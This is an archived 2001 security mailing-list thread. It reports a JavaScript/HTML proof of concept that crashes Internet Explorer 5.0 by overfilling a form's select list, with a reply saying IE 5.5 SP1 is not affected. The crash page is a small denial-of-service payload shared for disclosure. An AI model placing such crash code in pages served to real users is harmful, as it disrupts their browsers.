Seems IE 5.5 SP1 (v5.5.4522.1800) on WinNT4 Sp5 is not susceptible...

Regards,
Tim.

-----Original Message-----
From: Thomas Magnum [mailto:dr_oo_pyat_private]
Sent: Wednesday, 23 May 2001 1:44
To: VULN-DEVat_private
Subject: I: IE 5.0 vulnerability

I found out a vulnerability for IE 5.0, don't know if it was already
discovered (if so, forget this).
It seems that the problem is JavaScript. I don't know if it is exploitable,
but if I try to open an HTML file like this:

<script>
function crashme() {
    var i, opt;
    for(i = 0; i < 7; i++) {
        opt = new Option('crashing...', i);
        document.vulnForm.p_select.options[i] = opt;
        document.vulnForm.p_select.options[i].selected = true;
    }
}
</script>
<html>
<head>
<title>IE 5.0 Vulnerability</title>
</head>
<body>
<form name="vulnForm">
<table width="100%" border="0">
    <tr>
        <td align="center">
            <select name="p_select" size="5" multiple>
                <option>__________________</option>
            </select>
        </td>
    </tr>
    <tr>
        <td align="center">
            <input type="button" name="cmd" value="go!" onClick="crashme()">
        </td>
    </tr>
</table>
</form>
</body>
</html>

I get the classical Winxx error...
I noticed that IE crashes when I try to put in the select at least 3 items
more than its size.

This archive was generated by hypermail 2b30 : Tue May 22 2001 - 21:47:33 PDT